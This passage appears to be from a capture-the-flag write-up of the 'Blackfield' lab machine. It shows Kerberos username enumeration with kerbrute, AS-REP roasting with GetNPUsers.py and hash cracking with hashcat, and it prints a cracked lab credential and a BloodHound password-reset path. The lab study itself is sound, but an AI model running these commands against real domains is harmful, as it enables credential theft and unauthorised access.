Kerberos - 88

So we've got usernames list from the share we found. We also got usernames list from SID bruteforcing. I used kerbrute to find valid usernames.

kerbrute userenum -d blackfield.local --dc 10.10.10.192 usernames                                                                   

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/11/25 - Ronnie Flathers @ropnop

2025/02/11 23:36:58 >  Using KDC(s):
2025/02/11 23:36:58 >   10.10.10.192:88

2025/02/11 23:37:19 >  [+] VALID USERNAME:       [email protected]
2025/02/11 23:39:21 >  [+] VALID USERNAME:       [email protected]
2025/02/11 23:39:21 >  [+] VALID USERNAME:       [email protected]
2025/02/11 23:39:48 >  Done! Tested 317 usernames (3 valid) in 170.431 seconds

And after that I used GetSPN to find users with pre-auth not required.

GetNPUsers.py blackfield.local/ -no-pass -dc-ip 10.10.10.192 -usersfile sid_users

And found a hash

Using hashcat, we get our first pair of credentials. [email protected]:#00^BlackKnight

It only allow SMB and we can read shares but not all shares.

Still no access to shares. We know there are other users. So I ran bloodhound to graph it.

Bloodhound

We can change password for the user audit2020. Bloodhound also shows how it can be exploited both from Linux and Windows.

PreviousDNS - 53NextFoothold

Last updated